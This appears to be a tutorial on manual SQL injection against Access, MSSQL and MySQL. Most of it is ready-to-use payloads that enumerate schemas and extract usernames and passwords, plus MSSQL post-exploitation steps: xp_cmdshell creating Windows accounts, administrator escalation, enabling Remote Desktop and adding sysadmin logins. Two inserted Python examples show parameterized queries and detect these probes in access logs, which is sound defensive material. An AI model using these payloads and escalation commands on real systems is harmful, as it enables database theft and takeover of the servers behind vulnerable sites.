Basic workflow of manual injection for Access, MSSQL and MySQL

0x01 Access injection:

Guess the table name: admin
and (select count(*) from admin)>0
Guess the column names: username, password
admin_user admin_pwd
and (select count(admin_user) from admin)>0
Guess the length of the values: admin_user=5, admin_pwd=16
and (select len(admin_user) from admin)=4  (try each length in turn)
Guess the values:
and (select left(admin_user,1) from admin)='a'
try letters and digits one at a time inside the quotes
and (select left(admin_user,2) from admin)='ad'
and (select left(admin_user,3) from admin)='adm'

Offset injection
Guess the table name:
and exists (select * from <table name you are guessing>)
Check whether the table exists (if it does, the page loads normally; guessing columns works the same way). Result: the table admin exists.

Guess the column names:
and exists (select <column name you are guessing> from <table name you already found>)

Check whether the column exists (result: username and password exist).
order by n until the page no longer returns normally; the number of columns is then n-1. Pick n by binary search.

Find the displayed positions
union select 1,2,3,4,5,...,n-1 from admin

Use the displayed positions to read the column contents
union select 1,2,username,4,5,...,n-1 from admin

0x02 MSSQL / SQL Server injection:

Identify the injection point:
and 1=1 and 1=2
Guess the version:
and 1=@@version
Guess the user name:
and 1=user
Guess the current database: article
and 1=db_name()
Guess the other databases:
and 1=(select name from master.dbo.sysdatabases where dbid=6)
Guess the first table name: 'admin'
Because it lists objects of the current database, sysobjects here is article.sys.sysobjects
and (select top 1 name from sysobjects where xtype='u')>0
Guess the other table names: 't_jiaozhu'
and (select top 1 name from sysobjects where xtype='u' and name not in('admin'))>0
Guess the columns: username, password
and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0
Guess the values
and (select username from admin)>0
Crack the password MD5, or change the stored MD5 value of the password
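The `and 1=1` / `and 1=2` pair above only tells the tester anything because the application splices the parameter straight into the query text. The following Python is an added example, not code from the original post: it builds an in-memory SQLite database with constructed sample rows (a hypothetical `article` table) and runs the same two probes against a concatenated query, a parameterized query, and a parameterized query behind type validation. The boolean oracle exists only in the first case.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(1, "first post"), (2, "second post")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the request parameter becomes part of the SQL text."""
    sql = "SELECT title FROM article WHERE id = " + str(user_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is data and can never be parsed as SQL."""
    sql = "SELECT title FROM article WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def lookup_validated(conn, user_id):
    """Validate the type before binding, so `id` can only ever be an integer.

    Returns None for malformed input; a web handler would map that to 400.
    """
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return None
    return lookup_parameterized(conn, id_int)


def oracle_present(lookup):
    """True if the TRUE/FALSE probe pair from the page yields different results,
    i.e. the endpoint leaks whether an injected condition held."""
    conn = make_db()
    true_probe = lookup(conn, "1 and 1=1")
    false_probe = lookup(conn, "1 and 1=2")
    return true_probe != false_probe


if __name__ == "__main__":
    for fn in (lookup_vulnerable, lookup_parameterized, lookup_validated):
        print(f"{fn.__name__:22s} boolean oracle: {oracle_present(fn)}")
```

With the parameterized query SQLite compares the integer column against the literal text `1 and 1=1`, which never matches, so both probes return the same empty result and the oracle vanishes; the validated variant rejects the input before a query is ever sent, which is the behaviour to aim for on any numeric parameter.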


Follow-up actions
Using SQL Server extended stored procedures
Create a system user:
net user username pass /add
Escalate system privileges
net localgroup administrators username /add
Enable 3389 (Remote Desktop)
reg add "hklm\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f
Create a database user:
;exec master..sp_addlogin user,pass;--
Escalate database privileges:
;exec master..sp_addsrvrolemember aa,sysadmin;--
Using xp_cmdshell
Create a system user
;exec master..xp_cmdshell "net user bb bb /add"--
Disable xp_cmdshell:
;exec master..sp_dropextendedproc 'xp_cmdshell'
Restore xp_cmdshell
;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Fully prevent overflow (escalation) attacks
c:\windows\system32\cmd.exe: remove all default permissions.
Add administrator with Full Control

0x03 MySQL injection:

Guess the number of columns (%23 is the URL-encoded # comment)
order by 3%23
union select 1,2,3%23
Get the current database name
union select 1,(select database()) ,3%23
security
Get all database names
union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23
information_schema,challenges,mysql,performance_schema,security
Get the table names (0x7365637572697479 is the hex encoding of 'security')
union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23
emails,referers,uagents,users
Get the column names (0x7573657273 is the hex encoding of 'users')
union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23
id,username,password
Get the data (0x7c is '|', used as a field separator)
union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
Get the database version
union select 1,@@version,database()%23
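Every stage of the three workflows above, the boolean probes, `order by` column counting, `union select`, enumeration of `information_schema` or `sysobjects`, `xp_cmdshell` calls and `@@version` fingerprinting, leaves a recognisable trace in the web server's access log. The following Python is an added example, not part of the original post: it URL-decodes the query string of constructed sample log lines (all hosts, paths and addresses are invented), matches each against a small rule set covering those stages, and flags source addresses that trip more than one rule, which separates a probing client from a single false positive such as a legitimate `order by date` search parameter.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page), in the
# common "client - - [time] "METHOD path HTTP/1.1" status" layout.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.asp?id=1 HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.asp?id=1%20and%201=1 HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /article.asp?id=1%20and%201=2 HTTP/1.1" 500',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /article.asp?id=1%20and%20(select%20count(*)%20from%20admin)>0 HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /article.asp?id=1%20order%20by%205 HTTP/1.1" 500',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,2,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.aspx?id=3;exec%20master..xp_cmdshell%20%27ver%27-- HTTP/1.1" 500',
    '10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200',
]

# One rule per stage of the manual workflows on the page.
RULES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "subquery_probe": re.compile(r"\(\s*select\s+(count|len|left|top)\b", re.I),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\b(information_schema|sysobjects|sysdatabases)\b", re.I),
    "cmd_exec": re.compile(r"\bxp_cmdshell\b", re.I),
    "fingerprint": re.compile(r"@@version|\bdb_name\(\)|\bdatabase\(\)", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')


def decode_query(line):
    """Return the URL-decoded query string of one log line, or '' if none."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return ""
    query = m.group(1).split("?", 1)[1]
    # Decode twice so that double-encoded payloads (%2520 etc.) are still seen.
    return unquote_plus(unquote_plus(query))


def classify(line):
    """Return the sorted list of rule names matching one log line."""
    query = decode_query(line)
    return sorted(name for name, rx in RULES.items() if rx.search(query))


def scan_log(lines):
    """Return [(index, source_ip, [rule names])] for lines matching any rule."""
    hits = []
    for i, line in enumerate(lines):
        rules = classify(line)
        if rules:
            hits.append((i, line.split(" ", 1)[0], rules))
    return hits


def probing_clients(lines, threshold=2):
    """Source addresses with at least `threshold` flagged lines: repeated probes,
    rather than a one-off match on a benign parameter."""
    counts = {}
    for _, ip, _ in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for idx, ip, rules in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {ip} -> {', '.join(rules)}")
    print("probing clients:", probing_clients(SAMPLE_LOG))
```

The rule names map directly onto the sections above, so a hit sequence such as `boolean_probe`, `subquery_probe`, `column_count_probe` from one address reproduces the page's Access workflow in the order it was typed; that ordering, not any single match, is the signal worth alerting on.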

0x04 References:

1 ACCESS+MSSQL manual injection notes
2 sqli-labs detailed walkthrough guide